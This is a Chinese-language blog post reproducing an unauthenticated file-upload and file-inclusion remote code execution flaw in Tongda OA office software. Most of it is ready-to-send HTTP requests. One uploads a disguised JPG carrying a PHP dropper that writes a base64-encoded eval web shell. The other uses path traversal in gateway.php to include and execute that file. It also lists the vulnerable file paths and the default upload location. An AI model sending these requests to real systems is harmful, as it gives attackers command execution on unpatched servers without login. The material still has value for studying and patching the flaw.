没关注?伸出手指点这里---
通达OA文件上传&文件包含漏洞解析
通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。
文件上传与包含搭建本地环境
通达OA下载:链接:/s/1QFAoLxj9pD1bnnq3f4I8lg提取码:ousi包含漏洞的两个文件:文件上传:webroot\ispirit\im\upload.php文件包含:webroot\ispirit\interface\gateway.php
漏洞复现
在没有登录的情况下上传文件我们直接访问http://localhost//ispirit/im/upload.php提示:-ERR 用户未登陆ok,我们在burp中构造数据包
POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.174.159:80Content-Length: 602Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="P"------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundaryBwVAwV3O4sifyhr3Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php$fp = fopen(bskali.php, w);$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");fwrite($fp, $a);fclose($fp);?>------WebKitFormBoundaryBwVAwV3O4sifyhr3--这里我构造了一个名为bbskali.php的图片一句话木马。但是上传之后格式为jpg格式。
成功上传图片木马如上图,我们成功上传图片。位置为/339702047.jpg通达OA默认上传位置:myoa/attach/im则上面的完整路劲为:myoa/attach/im//339702047.jpg
通过文件包含解析出一句话
POST /ispirit/interface/gateway.php HTTP/1.1Host: 192.168.123.209User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/0101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 59json={"url":"/general/../../attach/im//339702047.jpg"}
解析为php一句话
论坛地址: